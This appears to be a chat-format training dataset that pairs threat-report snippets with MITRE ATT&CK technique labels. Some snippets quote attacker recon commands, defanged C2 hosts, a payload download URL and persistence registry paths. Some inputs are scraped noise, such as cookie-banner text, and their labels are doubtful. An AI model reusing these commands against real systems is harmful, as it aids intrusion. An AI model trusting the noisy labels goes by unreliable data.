- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware platform can use ICMP to communicate between infected computers."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum can collect computer name, locale information, and information about the OS and architecture."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used Dropbox, Amazon S3, and Google Drive to host malicious downloads."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes can steal login credentials and stored financial information from the browser."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This static set of characteristics, combined with the minimal use of obfuscation in their phishing attacks, may benefit organizations that are potential targets for IRON TILDEN.ToolsTaegis™ XDR Adversary Software Coverage Tool"
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used stolen credentials to connect to the victim's network via VPN."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop can search for processes with antivirus and antimalware product names."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BendyBear can check for analysis environments and signs of debugging using the Windows API \"kernel32!GetTickCountKernel32\" call."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The magic value 0xFEEDFACF that belongs to Mach-O Executable (64 bit) Methods GET_LAUNCHNAME and GET_LABELNAME will return the hardcoded name of the property list “.plist” for the root user (com.apple.screen.assistantd.plist) and for the regular user (com.apple.spell.agent.plist)"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz can gather the victim OS version and whether it is 64 or 32 bit."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz's `CRYPTO` module can create and export various types of authentication certificates."
- },
- {
- "role": "assistant",
- "content": "T1649 - Steal or Forge Authentication Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From these web shells, they launched reconnaissance commands, stole data, and dropped additional tools including portqry.exe, renamed cmd.exe, winrar, and the notorious hTran"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website, including"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When running under a limited UAC account, the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has the ability to execute its payload via PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Consent - Details - [#IABV2SETTINGS#] - About This website uses cookies . We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest [x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email. Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. Regarding Metasploit’s shikata_ga_nai encoder – although it’s available for everyone and couldn’t be the basis for attribution, we know this encoder has been used by LuckyMouse previously. Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can´t prove they were related to this particular attack. The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to IP-address, that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Otherwise, it will add the binary’s path to the Software\\Microsoft\\Windows\\CurrentVersion\\Run key with —Update as a parameter"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell: Append a string to the password that acts as a salt Obtain the SHA1 hash of the resulting string containing the password and salt Base64 encode the SHA1 hash Compare the encoded hash with hardcoded base64 string If the encoded hash matches hardcoded base64 string then the inbound request is authenticated Generates the SHA256 hash of the password string Base64 encodes the SHA256 hash and uses the first 24 characters as a key Uses 24-character key and the 3DES cipher to decrypt the embedded webshell Now let’s look at how this works with the values in the TwoFace++ loader sample"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1140 - Deobfuscate/Decode Files or Information', 'T1027 - Obfuscated Files or Information', 'T1550.002 - Use Alternate Authentication Material: Pass the Hash', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can deliver Beacon payloads for lateral movement by leveraging remote COM execution."
- },
- {
- "role": "assistant",
- "content": "T1021.003 - Remote Services: Distributed Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amavis analyzes the e-mail attachments and inspects the contents of the attached archive. It invokes cpio and CVE-2015-1197 is triggered."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1546 - Event Triggered Execution', 'T1588.006 - Vulnerabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This shortcut file calls the built-in ‘control.exe’ utility to in turn load the previously dropped malicious CPL file of ‘winhelp.cpl’"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group extensively uses long-running strategic web compromises[2] (SWCs), and relies on whitelists to deliver payloads to select victims. In comparison to other threat groups, TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information: netstat -ano > %TEMP%\\info.datipconfig /all >> %TEMP%\\info.datroute PRINT >> %TEMP%\\info.datnet view >> %TEMP%\\info.dattasklist >> %TEMP%\\info.datnet user >> %TEMP%\\info.datnet start >> %TEMP%\\info.dat This script is written to a temporary file prior to be executed"
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nefilim uses the following ‘timeout’ command to delay the execution of the ‘del’ command. Adversaries use this command also to evade sandbox analysis. C:\\Windows\\System32\\cmd.exe\" /c timeout /t 3 /nobreak\""
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A .dll that contains is loaded and executed using DLL side-loading."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can use `sdclt.exe` to bypass UAC in Windows 10 to escalate privileges; for older Windows versions WarzoneRAT can use the IFileOperation exploit to bypass the UAC module."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The RTF file contains macro codes that will execute a PowerShell command to retrieve a dynamic-link library (DLL) file before executing it using odbcconf.exe, a command-line utility related to Microsoft Data Access Components. The DLL will drop and execute a malicious JScript using regsvr32.exe, another command-line utility, to download another JScript and execute it using the same regsvr32.exe. During analysis, we received a PowerShell command that downloads Cobalt Strike from hxxps://5[.]135[.]237[.]216[/]RLxF"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1218.008 - Signed Binary Proxy Execution: Odbcconf"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot searches for certain Registry keys to be configured before executing the payload."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can load DLLs through vulnerable legitimate executables."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempted to get users to launch malicious attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Besides of fetching a list of scanning targets, Xbash will also request C2 server via URI “/p” to fetch a list of weak passwords for brute forcing"
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aoqin Dragon has run scripts to identify file formats including Microsoft Word."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has used known administrator account credentials to execute the backdoor directly."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "compresses collected files with both the GZipStream class and a simple character replacement scheme before sending them to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When neither of the previous commands are received, the message is taken as a command to be executed with cmd.exe. The output is sent to the server."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1202 - Indirect Command Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since the original publication of this approach, Proofpoint researchers have observed a number of actors -- “early adopters” -- abusing this file format by embedding it inside Microsoft Word and PDF documents. While the combination of the technique with the Microsoft Word container was described in the initial research, embedding inside PDFs has not been documented and likely originated with another source"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can obtain the victim username and permissions."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the mutex does not exist and a Windows Startup Registry key with name “System Update” does not exist, the malware performs its initialization routine by: Copying itself to the path %PROGRAMDATA%\\svchost.exe Sets the Windows Startup Registry key with the name “System Update” which points to the above dropped payload"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL has the ability to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Download and execution of ntbscan (SHA-1: 90da10004c8f6fafdaa2cf18922670a745564f45) – NetBIOS scanner tool widely used by multiple APT actor including the prolific Chinese group APT10 - Execution of Windows built-in networking utility tools - Access to the victim’s files, especially documents located on the Desktop"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Duqu is capable of loading executable code via process hollowing."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, the buffer is encrypted using the RC4 algorithm with the 50-byte key (also stored in the backdoor’s body)"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has been configured with several servers available for alternate C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can create a memory dump of LSASS via the `MiniDumpWriteDump Win32` API call."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "httpclient encrypts C2 content with XOR using a single byte, 0x12."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can enumerate host system information like OS, architecture, domain name, applied patches, and more."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language. The main module collecting information about the machine"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery', 'T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can perform DLL injection."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet uses a Windows rootkit to mask its binaries and other relevant files."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses XOR with random keys for its communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. The decryption algorithm is RC4, which takes the hardcoded path to form the decryption key. If the decrypted payload is valid, it picks a specific existing Windows Service — LanmanServer, which is run by svchost.exe — and injects the decrypted shellcode into the legitimate service. In most cases, the payload is a first-stage backdoor, and its main purpose is to retrieve second-stage payloads — either by connecting to a C&C server or opening a port to wait for external connections and load incoming executables"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used RDP to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Matryoshka is capable of stealing Outlook passwords."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "scans the C-class subnet of the IPs on the victim's interfaces."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trickbot is installed as a scheduled task, using names like “WinDotNet,” “GoogleTask,” or “Sysnetsf” to masquerade as legitimate-appearing processes. These point to various copies of TrickBot installed in the system, usually within the user profile under %USER_DIR%\\AppData\\Roaming\\ or a subdirectory. The subdirectories also use similarly misleading names like “WinDefrag” or “NetSocket” to appear innocuous. TrickBot may also be installed as a service with names like “ControlServiceA” that points to a copy in the system drive root"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service', 'T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITSAdmin can be used to create BITS Jobs to upload files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
